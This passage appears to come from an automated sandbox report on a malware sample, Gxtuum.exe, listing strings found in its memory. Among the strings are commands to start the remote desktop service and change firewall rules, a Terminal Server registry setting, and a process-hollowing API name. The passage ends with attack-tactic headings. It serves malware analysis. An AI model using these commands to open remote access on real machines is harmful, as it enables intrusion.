1UKDXVRbadI5cv==XeVn1U1eGs0HIAHNUweSzu6vL8A6XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712WkWyffVoXwowMuGgXzJpXTAlbSK=XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712TUiA K0o2PJ7SS9pbBugUe2sQySucB==MNVNPLAUUf7GVMqFAI==0wFqaq==Xw9NTq==USVOdOQ0gfM0fUQ0eVM01ek01PI0fyM0gO402y001PY0ezY0eUc0fb0=1VJfXsWobBv81Uqp4u2gbLtX1VJfXsWobBu=1UxjasWobBu=2vE=2LE=2LI=2LM=WOFj 7==dzRUatfzLr==dzRUaxD Lt6=2Phf2yxm1U1efzMrePNjhelqOVFV9MM4SyM+SyQ+OTBmbM5tbiKvNqslLo==is==MfVo9NHcSI==fUhf wnDMd3keyp=dUVs cMwMuGu2yqsUUVURcw4aSXlXVez5ySpS11bdt==XzJpXTAlbPPhgyycTNZvSRHkUX7mgz7h4eR=TPZjacv=VUFtawMCcXr5LwqhP9==UNNzTq==XyFoXwvkUXTjgPCp5zh=Uy9dbw0CIAbl19==TNZBPrYqTw04YRvT2OG14eiWeV==TelUXwMqZR3k2PB=We9sbw0yXU9q9w0DTU9n SIzYUloPwMqZR3k2PB=PvEsKpH5Nea4RI==feI=gUI=TU9obwMydxZUhPulFaypd1tPcUClarHl2e9s ISoYSPhRqui3VSqZLBngQ1xJWRjOK0nJIRxGIpx SW4ZR30OMKp4Vyrc7hPcT yMmsceVJnJMIldBC7LyYh3OR5IrN7fDFmMCscdOxf cwxZOYiL90EOS0ydBTuguUU6PyhOnx7eECw90E8gylp 90zYYPlguUz5zGhY1WCEd1OGIonJIRxLNY=OK0HA7==SVNda RBOepqXm==TU9obwMydxZUhPulFaydcMxhcTOlbKclea9YJN57dtZmeVCtCPSubLRj0Z oX0H=XTlNTuMRXzL1ffCl3fOzb71Pej wS6MQ0wNp dICbXvcTU2t4zSWZ2FD0T2pVIElePBVbwMCThDt2I==TU9naxM4ZSHO1OUl1OJdXwMqZXfpdems3O2rcMBne0S5br5UhPoqKJzDNyS2Qr 5CN5=OPVo9MEzZBStXTlNTuMRXzL1ffCl3fOzb71Pej wS6MQ0wNp dICbXvcYOYp5ySgVrh 1T gO40EYxJJRvo0SPPFWTp=XTlNTuMRXzLvefKy3UuPZ2MlOAGgS6MogeldXNEgQhDzdOGE2PKsbLBUZC0tXKMlYeleXM0NRv==0vAqKtr=UyVgWNMwdALlgzKp3eavLqdH1UOz LMQdO9oUyVgWNMwdALlgzKp3eavLqhH1UOz LMQdO9oXS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVMaRbIgQYTyfeOu5xWhcsJedZ5=XzJpXxMndz3heON=PbArMG==PbAsK7==PbArL7==PbAsLG==TVVsacMydzH1dOqk0s==Rbo0ffVoXwowMuGu2PalOUsaLfRbaSkvaRvsLu2mzu6lbXw8LaAgH9s4aRZleVO0zvBcJnU61DWwGE==MaYaPN9tdxG=LaAgH9sCZR2gLuYgGq==Xy9XXNADaBTseuYl6yR=OOVYXME5dBjvefuv3yifeXxn1T2zbKMpdOdoXMHkLPXpeyNgz9==L9==fUhVbwIzdX2gOPFgCPNcMF==fVQ3am==feFoXw0xVUVZWc0lchOgWyy53VSWXKxn1TyzW0H=PvAqKtr4MOi=PvAqKtr4MeG=PvAqKtr4MeK=PvAqKtr4MXW=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule gr
                          Source: Gxtuum.exe, 00000013.00000000.1599363776.0000000000351000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: net start termservice
                          Source: Gxtuum.exe, 00000013.00000000.1599363776.0000000000351000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setd3a5912ea69ad34a2387af70c8be9e2143266f2abbf198987ad62d4962cf71340f3be6bcafd92004fa390d280e7ea4875c9234PLgVJ 8BLeW4Obx0Eo==OrdW9wQuaXSzOUeuQyS0Lsxdex==PLgVJ 8BLeW4Obx0Fs==OrhAbdL5ahe0UyCTCUiqZLRTNkCsaE==QK4rKq==Xq0f xLxMK1mbG==OKVmbG==2OUsMMMlNOy419==UVhUbNMxLhT42I==XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712WkWyR6W 2I==XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712TUiA K0o2PJ7TNEpcdzTdyOs3uyCb7t 1UKDXVRbadI5cv==XeVn1U1eGs0HIAHNUweSzu6vL8A6XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712WkWyffVoXwowMuGgXzJpXTAlbSK=XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712TUiA K0o2PJ7SS9pbBugUe2sQySucB==MNVNPLAUUf7GVMqFAI==0wFqaq==Xw9NTq==USVOdOQ0gfM0fUQ0eVM01ek01PI0fyM0gO402y001PY0ezY0eUc0fb0=1VJfXsWobBv81Uqp4u2gbLtX1VJfXsWobBu=1UxjasWobBu=2vE=2LE=2LI=2LM=WOFj 7==dzRUatfzLr==dzRUaxD Lt6=2Phf2yxm1U1efzMrePNjhelqOVFV9MM4SyM+SyQ+OTBmbM5tbiKvNqslLo==is==MfVo9NHcSI==fUhf wnDMd3keyp=dUVs cMwMuGu2yqsUUVURcw4aSXlXVez5ySpS11bdt==XzJpXTAlbPPhgyycTNZvSRHkUX7mgz7h4eR=TPZjacv=VUFtawMCcXr5LwqhP9==UNNzTq==XyFoXwvkUXTjgPCp5zh=Uy9dbw0CIAbl19==TNZBPrYqTw04YRvT2OG14eiWeV==TelUXwMqZR3k2PB=We9sbw0yXU9q9w0DTU9n SIzYUloPwMqZR3k2PB=PvEsKpH5Nea4RI==feI=gUI=TU9obwMydxZUhPulFaypd1tPcUClarHl2e9s ISoYSPhRqui3VSqZLBngQ1xJWRjOK0nJIRxGIpx SW4ZR30OMKp4Vyrc7hPcT yMmsceVJnJMIldBC7LyYh3OR5IrN7fDFmMCscdOxf cwxZOYiL90EOS0ydBTuguUU6PyhOnx7eECw90E8gylp 90zYYPlguUz5zGhY1WCEd1OGIonJIRxLNY=OK0HA7==SVNda RBOepqXm==TU9obwMydxZUhPulFaydcMxhcTOlbKclea9YJN57dtZmeVCtCPSubLRj0Z oX0H=XTlNTuMRXzL1ffCl3fOzb71Pej wS6MQ0wNp dICbXvcTU2t4zSWZ2FD0T2pVIElePBVbwMCThDt2I==TU9naxM4ZSHO1OUl1OJdXwMqZXfpdems3O2rcMBne0S5br5UhPoqKJzDNyS2Qr 5CN5=OPVo9MEzZBStXTlNTuMRXzL1ffCl3fOzb71Pej wS6MQ0wNp dICbXvcYOYp5ySgVrh 1T gO40EYxJJRvo0SPPFWTp=XTlNTuMRXzLvefKy3UuPZ2MlOAGgS6MogeldXNEgQhDzdOGE2PKsbLBUZC0tXKMlYeleXM0NRv==0vAqKtr=UyVgWNMwdALlgzKp3eavLqdH1UOz LMQdO9oUyVgWNMwdALlgzKp3eavLqhH1UOz LMQdO9oXS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVMaRbIgQYTyfeOu5xWhcsJedZ5=XzJpXxMndz3heON=PbArMG==PbAsK7==PbArL7==PbAsLG==TVVsacMydzH1dOqk0s==Rbo0ffVoXwowMuGu2PalOUsaLfRbaSkvaRvsLu2mzu6lbXw8LaAgH9s4aRZleVO0zvBcJnU61DWwGE==MaYaPN9tdxG=LaAgH9sCZR2gLuYgGq==Xy9XXNADaBTseuYl6yR=OOVYXME5dBjvefuv3yifeXxn1T2zbKMpdOdoXMHkLPXpeyNgz9==L9==fUhVbwIzdX2gOPFgCPNcMF==fVQ3am==feFoXw0xVUVZWc0lchOgWyy53VSWXKxn1TyzW0H=PvAqKtr4MOi=PvAqKtr4MeG=PvAqKtr4MeK=PvAqKtr4MXW=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule gr
                          Source: Gxtuum.exeString found in binary or memory: net start termservice
                          Source: Gxtuum.exe, 00000014.00000000.1601024347.0000000000351000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: net start termservice
                          Source: Gxtuum.exe, 00000014.00000000.1601024347.0000000000351000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setd3a5912ea69ad34a2387af70c8be9e2143266f2abbf198987ad62d4962cf71340f3be6bcafd92004fa390d280e7ea4875c9234PLgVJ 8BLeW4Obx0Eo==OrdW9wQuaXSzOUeuQyS0Lsxdex==PLgVJ 8BLeW4Obx0Fs==OrhAbdL5ahe0UyCTCUiqZLRTNkCsaE==QK4rKq==Xq0f xLxMK1mbG==OKVmbG==2OUsMMMlNOy419==UVhUbNMxLhT42I==XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712WkWyR6W 2I==XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712TUiA K0o2PJ7TNEpcdzTdyOs3uyCb7t 1UKDXVRbadI5cv==XeVn1U1eGs0HIAHNUweSzu6vL8A6XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712WkWyffVoXwowMuGgXzJpXTAlbSK=XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712TUiA K0o2PJ7SS9pbBugUe2sQySucB==MNVNPLAUUf7GVMqFAI==0wFqaq==Xw9NTq==USVOdOQ0gfM0fUQ0eVM01ek01PI0fyM0gO402y001PY0ezY0eUc0fb0=1VJfXsWobBv81Uqp4u2gbLtX1VJfXsWobBu=1UxjasWobBu=2vE=2LE=2LI=2LM=WOFj 7==dzRUatfzLr==dzRUaxD Lt6=2Phf2yxm1U1efzMrePNjhelqOVFV9MM4SyM+SyQ+OTBmbM5tbiKvNqslLo==is==MfVo9NHcSI==fUhf wnDMd3keyp=dUVs cMwMuGu2yqsUUVURcw4aSXlXVez5ySpS11bdt==XzJpXTAlbPPhgyycTNZvSRHkUX7mgz7h4eR=TPZjacv=VUFtawMCcXr5LwqhP9==UNNzTq==XyFoXwvkUXTjgPCp5zh=Uy9dbw0CIAbl19==TNZBPrYqTw04YRvT2OG14eiWeV==TelUXwMqZR3k2PB=We9sbw0yXU9q9w0DTU9n SIzYUloPwMqZR3k2PB=PvEsKpH5Nea4RI==feI=gUI=TU9obwMydxZUhPulFaypd1tPcUClarHl2e9s ISoYSPhRqui3VSqZLBngQ1xJWRjOK0nJIRxGIpx SW4ZR30OMKp4Vyrc7hPcT yMmsceVJnJMIldBC7LyYh3OR5IrN7fDFmMCscdOxf cwxZOYiL90EOS0ydBTuguUU6PyhOnx7eECw90E8gylp 90zYYPlguUz5zGhY1WCEd1OGIonJIRxLNY=OK0HA7==SVNda RBOepqXm==TU9obwMydxZUhPulFaydcMxhcTOlbKclea9YJN57dtZmeVCtCPSubLRj0Z oX0H=XTlNTuMRXzL1ffCl3fOzb71Pej wS6MQ0wNp dICbXvcTU2t4zSWZ2FD0T2pVIElePBVbwMCThDt2I==TU9naxM4ZSHO1OUl1OJdXwMqZXfpdems3O2rcMBne0S5br5UhPoqKJzDNyS2Qr 5CN5=OPVo9MEzZBStXTlNTuMRXzL1ffCl3fOzb71Pej wS6MQ0wNp dICbXvcYOYp5ySgVrh 1T gO40EYxJJRvo0SPPFWTp=XTlNTuMRXzLvefKy3UuPZ2MlOAGgS6MogeldXNEgQhDzdOGE2PKsbLBUZC0tXKMlYeleXM0NRv==0vAqKtr=UyVgWNMwdALlgzKp3eavLqdH1UOz LMQdO9oUyVgWNMwdALlgzKp3eavLqhH1UOz LMQdO9oXS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVMaRbIgQYTyfeOu5xWhcsJedZ5=XzJpXxMndz3heON=PbArMG==PbAsK7==PbArL7==PbAsLG==TVVsacMydzH1dOqk0s==Rbo0ffVoXwowMuGu2PalOUsaLfRbaSkvaRvsLu2mzu6lbXw8LaAgH9s4aRZleVO0zvBcJnU61DWwGE==MaYaPN9tdxG=LaAgH9sCZR2gLuYgGq==Xy9XXNADaBTseuYl6yR=OOVYXME5dBjvefuv3yifeXxn1T2zbKMpdOdoXMHkLPXpeyNgz9==L9==fUhVbwIzdX2gOPFgCPNcMF==fVQ3am==feFoXw0xVUVZWc0lchOgWyy53VSWXKxn1TyzW0H=PvAqKtr4MOi=PvAqKtr4MeG=PvAqKtr4MeK=PvAqKtr4MXW=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule gr
                          Source: Gxtuum.exe, 00000014.00000002.1606998241.0000000000351000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: net start termservice
                          Source: Gxtuum.exe, 00000014.00000002.1606998241.0000000000351000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setd3a5912ea69ad34a2387af70c8be9e2143266f2abbf198987ad62d4962cf71340f3be6bcafd92004fa390d280e7ea4875c9234PLgVJ 8BLeW4Obx0Eo==OrdW9wQuaXSzOUeuQyS0Lsxdex==PLgVJ 8BLeW4Obx0Fs==OrhAbdL5ahe0UyCTCUiqZLRTNkCsaE==QK4rKq==Xq0f xLxMK1mbG==OKVmbG==2OUsMMMlNOy419==UVhUbNMxLhT42I==XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712WkWyR6W 2I==XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712TUiA K0o2PJ7TNEpcdzTdyOs3uyCb7t 1UKDXVRbadI5cv==XeVn1U1eGs0HIAHNUweSzu6vL8A6XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712WkWyffVoXwowMuGgXzJpXTAlbSK=XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712TUiA K0o2PJ7SS9pbBugUe2sQySucB==MNVNPLAUUf7GVMqFAI==0wFqaq==Xw9NTq==USVOdOQ0gfM0fUQ0eVM01ek01PI0fyM0gO402y001PY0ezY0eUc0fb0=1VJfXsWobBv81Uqp4u2gbLtX1VJfXsWobBu=1UxjasWobBu=2vE=2LE=2LI=2LM=WOFj 7==dzRUatfzLr==dzRUaxD Lt6=2Phf2yxm1U1efzMrePNjhelqOVFV9MM4SyM+SyQ+OTBmbM5tbiKvNqslLo==is==MfVo9NHcSI==fUhf wnDMd3keyp=dUVs cMwMuGu2yqsUUVURcw4aSXlXVez5ySpS11bdt==XzJpXTAlbPPhgyycTNZvSRHkUX7mgz7h4eR=TPZjacv=VUFtawMCcXr5LwqhP9==UNNzTq==XyFoXwvkUXTjgPCp5zh=Uy9dbw0CIAbl19==TNZBPrYqTw04YRvT2OG14eiWeV==TelUXwMqZR3k2PB=We9sbw0yXU9q9w0DTU9n SIzYUloPwMqZR3k2PB=PvEsKpH5Nea4RI==feI=gUI=TU9obwMydxZUhPulFaypd1tPcUClarHl2e9s ISoYSPhRqui3VSqZLBngQ1xJWRjOK0nJIRxGIpx SW4ZR30OMKp4Vyrc7hPcT yMmsceVJnJMIldBC7LyYh3OR5IrN7fDFmMCscdOxf cwxZOYiL90EOS0ydBTuguUU6PyhOnx7eECw90E8gylp 90zYYPlguUz5zGhY1WCEd1OGIonJIRxLNY=OK0HA7==SVNda RBOepqXm==TU9obwMydxZUhPulFaydcMxhcTOlbKclea9YJN57dtZmeVCtCPSubLRj0Z oX0H=XTlNTuMRXzL1ffCl3fOzb71Pej wS6MQ0wNp dICbXvcTU2t4zSWZ2FD0T2pVIElePBVbwMCThDt2I==TU9naxM4ZSHO1OUl1OJdXwMqZXfpdems3O2rcMBne0S5br5UhPoqKJzDNyS2Qr 5CN5=OPVo9MEzZBStXTlNTuMRXzL1ffCl3fOzb71Pej wS6MQ0wNp dICbXvcYOYp5ySgVrh 1T gO40EYxJJRvo0SPPFWTp=XTlNTuMRXzLvefKy3UuPZ2MlOAGgS6MogeldXNEgQhDzdOGE2PKsbLBUZC0tXKMlYeleXM0NRv==0vAqKtr=UyVgWNMwdALlgzKp3eavLqdH1UOz LMQdO9oUyVgWNMwdALlgzKp3eavLqhH1UOz LMQdO9oXS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVMaRbIgQYTyfeOu5xWhcsJedZ5=XzJpXxMndz3heON=PbArMG==PbAsK7==PbArL7==PbAsLG==TVVsacMydzH1dOqk0s==Rbo0ffVoXwowMuGu2PalOUsaLfRbaSkvaRvsLu2mzu6lbXw8LaAgH9s4aRZleVO0zvBcJnU61DWwGE==MaYaPN9tdxG=LaAgH9sCZR2gLuYgGq==Xy9XXNADaBTseuYl6yR=OOVYXME5dBjvefuv3yifeXxn1T2zbKMpdOdoXMHkLPXpeyNgz9==L9==fUhVbwIzdX2gOPFgCPNcMF==fVQ3am==feFoXw0xVUVZWc0lchOgWyy53VSWXKxn1TyzW0H=PvAqKtr4MOi=PvAqKtr4MeG=PvAqKtr4MeK=PvAqKtr4MXW=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule gr
                          Source: Gxtuum.exe, 00000017.00000000.2146010133.0000000000351000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: net start termservice
                          Source: Gxtuum.exe, 00000017.00000000.2146010133.0000000000351000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setd3a5912ea69ad34a2387af70c8be9e2143266f2abbf198987ad62d4962cf71340f3be6bcafd92004fa390d280e7ea4875c9234PLgVJ 8BLeW4Obx0Eo==OrdW9wQuaXSzOUeuQyS0Lsxdex==PLgVJ 8BLeW4Obx0Fs==OrhAbdL5ahe0UyCTCUiqZLRTNkCsaE==QK4rKq==Xq0f xLxMK1mbG==OKVmbG==2OUsMMMlNOy419==UVhUbNMxLhT42I==XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712WkWyR6W 2I==XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712TUiA K0o2PJ7TNEpcdzTdyOs3uyCb7t 1UKDXVRbadI5cv==XeVn1U1eGs0HIAHNUweSzu6vL8A6XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712WkWyffVoXwowMuGgXzJpXTAlbSK=XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712TUiA K0o2PJ7SS9pbBugUe2sQySucB==MNVNPLAUUf7GVMqFAI==0wFqaq==Xw9NTq==USVOdOQ0gfM0fUQ0eVM01ek01PI0fyM0gO402y001PY0ezY0eUc0fb0=1VJfXsWobBv81Uqp4u2gbLtX1VJfXsWobBu=1UxjasWobBu=2vE=2LE=2LI=2LM=WOFj 7==dzRUatfzLr==dzRUaxD Lt6=2Phf2yxm1U1efzMrePNjhelqOVFV9MM4SyM+SyQ+OTBmbM5tbiKvNqslLo==is==MfVo9NHcSI==fUhf wnDMd3keyp=dUVs cMwMuGu2yqsUUVURcw4aSXlXVez5ySpS11bdt==XzJpXTAlbPPhgyycTNZvSRHkUX7mgz7h4eR=TPZjacv=VUFtawMCcXr5LwqhP9==UNNzTq==XyFoXwvkUXTjgPCp5zh=Uy9dbw0CIAbl19==TNZBPrYqTw04YRvT2OG14eiWeV==TelUXwMqZR3k2PB=We9sbw0yXU9q9w0DTU9n SIzYUloPwMqZR3k2PB=PvEsKpH5Nea4RI==feI=gUI=TU9obwMydxZUhPulFaypd1tPcUClarHl2e9s ISoYSPhRqui3VSqZLBngQ1xJWRjOK0nJIRxGIpx SW4ZR30OMKp4Vyrc7hPcT yMmsceVJnJMIldBC7LyYh3OR5IrN7fDFmMCscdOxf cwxZOYiL90EOS0ydBTuguUU6PyhOnx7eECw90E8gylp 90zYYPlguUz5zGhY1WCEd1OGIonJIRxLNY=OK0HA7==SVNda RBOepqXm==TU9obwMydxZUhPulFaydcMxhcTOlbKclea9YJN57dtZmeVCtCPSubLRj0Z oX0H=XTlNTuMRXzL1ffCl3fOzb71Pej wS6MQ0wNp dICbXvcTU2t4zSWZ2FD0T2pVIElePBVbwMCThDt2I==TU9naxM4ZSHO1OUl1OJdXwMqZXfpdems3O2rcMBne0S5br5UhPoqKJzDNyS2Qr 5CN5=OPVo9MEzZBStXTlNTuMRXzL1ffCl3fOzb71Pej wS6MQ0wNp dICbXvcYOYp5ySgVrh 1T gO40EYxJJRvo0SPPFWTp=XTlNTuMRXzLvefKy3UuPZ2MlOAGgS6MogeldXNEgQhDzdOGE2PKsbLBUZC0tXKMlYeleXM0NRv==0vAqKtr=UyVgWNMwdALlgzKp3eavLqdH1UOz LMQdO9oUyVgWNMwdALlgzKp3eavLqhH1UOz LMQdO9oXS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVMaRbIgQYTyfeOu5xWhcsJedZ5=XzJpXxMndz3heON=PbArMG==PbAsK7==PbArL7==PbAsLG==TVVsacMydzH1dOqk0s==Rbo0ffVoXwowMuGu2PalOUsaLfRbaSkvaRvsLu2mzu6lbXw8LaAgH9s4aRZleVO0zvBcJnU61DWwGE==MaYaPN9tdxG=LaAgH9sCZR2gLuYgGq==Xy9XXNADaBTseuYl6yR=OOVYXME5dBjvefuv3yifeXxn1T2zbKMpdOdoXMHkLPXpeyNgz9==L9==fUhVbwIzdX2gOPFgCPNcMF==fVQ3am==feFoXw0xVUVZWc0lchOgWyy53VSWXKxn1TyzW0H=PvAqKtr4MOi=PvAqKtr4MeG=PvAqKtr4MeK=PvAqKtr4MXW=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule gr
                          Source: Gxtuum.exe, 00000017.00000002.3798952839.0000000000351000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: net start termservice
                          Source: Gxtuum.exe, 00000017.00000002.3798952839.0000000000351000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setd3a5912ea69ad34a2387af70c8be9e2143266f2abbf198987ad62d4962cf71340f3be6bcafd92004fa390d280e7ea4875c9234PLgVJ 8BLeW4Obx0Eo==OrdW9wQuaXSzOUeuQyS0Lsxdex==PLgVJ 8BLeW4Obx0Fs==OrhAbdL5ahe0UyCTCUiqZLRTNkCsaE==QK4rKq==Xq0f xLxMK1mbG==OKVmbG==2OUsMMMlNOy419==UVhUbNMxLhT42I==XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712WkWyR6W 2I==XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712TUiA K0o2PJ7TNEpcdzTdyOs3uyCb7t 1UKDXVRbadI5cv==XeVn1U1eGs0HIAHNUweSzu6vL8A6XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712WkWyffVoXwowMuGgXzJpXTAlbSK=XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712TUiA K0o2PJ7SS9pbBugUe2sQySucB==MNVNPLAUUf7GVMqFAI==0wFqaq==Xw9NTq==USVOdOQ0gfM0fUQ0eVM01ek01PI0fyM0gO402y001PY0ezY0eUc0fb0=1VJfXsWobBv81Uqp4u2gbLtX1VJfXsWobBu=1UxjasWobBu=2vE=2LE=2LI=2LM=WOFj 7==dzRUatfzLr==dzRUaxD Lt6=2Phf2yxm1U1efzMrePNjhelqOVFV9MM4SyM+SyQ+OTBmbM5tbiKvNqslLo==is==MfVo9NHcSI==fUhf wnDMd3keyp=dUVs cMwMuGu2yqsUUVURcw4aSXlXVez5ySpS11bdt==XzJpXTAlbPPhgyycTNZvSRHkUX7mgz7h4eR=TPZjacv=VUFtawMCcXr5LwqhP9==UNNzTq==XyFoXwvkUXTjgPCp5zh=Uy9dbw0CIAbl19==TNZBPrYqTw04YRvT2OG14eiWeV==TelUXwMqZR3k2PB=We9sbw0yXU9q9w0DTU9n SIzYUloPwMqZR3k2PB=PvEsKpH5Nea4RI==feI=gUI=TU9obwMydxZUhPulFaypd1tPcUClarHl2e9s ISoYSPhRqui3VSqZLBngQ1xJWRjOK0nJIRxGIpx SW4ZR30OMKp4Vyrc7hPcT yMmsceVJnJMIldBC7LyYh3OR5IrN7fDFmMCscdOxf cwxZOYiL90EOS0ydBTuguUU6PyhOnx7eECw90E8gylp 90zYYPlguUz5zGhY1WCEd1OGIonJIRxLNY=OK0HA7==SVNda RBOepqXm==TU9obwMydxZUhPulFaydcMxhcTOlbKclea9YJN57dtZmeVCtCPSubLRj0Z oX0H=XTlNTuMRXzL1ffCl3fOzb71Pej wS6MQ0wNp dICbXvcTU2t4zSWZ2FD0T2pVIElePBVbwMCThDt2I==TU9naxM4ZSHO1OUl1OJdXwMqZXfpdems3O2rcMBne0S5br5UhPoqKJzDNyS2Qr 5CN5=OPVo9MEzZBStXTlNTuMRXzL1ffCl3fOzb71Pej wS6MQ0wNp dICbXvcYOYp5ySgVrh 1T gO40EYxJJRvo0SPPFWTp=XTlNTuMRXzLvefKy3UuPZ2MlOAGgS6MogeldXNEgQhDzdOGE2PKsbLBUZC0tXKMlYeleXM0NRv==0vAqKtr=UyVgWNMwdALlgzKp3eavLqdH1UOz LMQdO9oUyVgWNMwdALlgzKp3eavLqhH1UOz LMQdO9oXS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVMaRbIgQYTyfeOu5xWhcsJedZ5=XzJpXxMndz3heON=PbArMG==PbAsK7==PbArL7==PbAsLG==TVVsacMydzH1dOqk0s==Rbo0ffVoXwowMuGu2PalOUsaLfRbaSkvaRvsLu2mzu6lbXw8LaAgH9s4aRZleVO0zvBcJnU61DWwGE==MaYaPN9tdxG=LaAgH9sCZR2gLuYgGq==Xy9XXNADaBTseuYl6yR=OOVYXME5dBjvefuv3yifeXxn1T2zbKMpdOdoXMHkLPXpeyNgz9==L9==fUhVbwIzdX2gOPFgCPNcMF==fVQ3am==feFoXw0xVUVZWc0lchOgWyy53VSWXKxn1TyzW0H=PvAqKtr4MOi=PvAqKtr4MeG=PvAqKtr4MeK=PvAqKtr4MXW=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule gr
                          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                          Gather Victim Identity InformationAcquire InfrastructureValid Accounts221
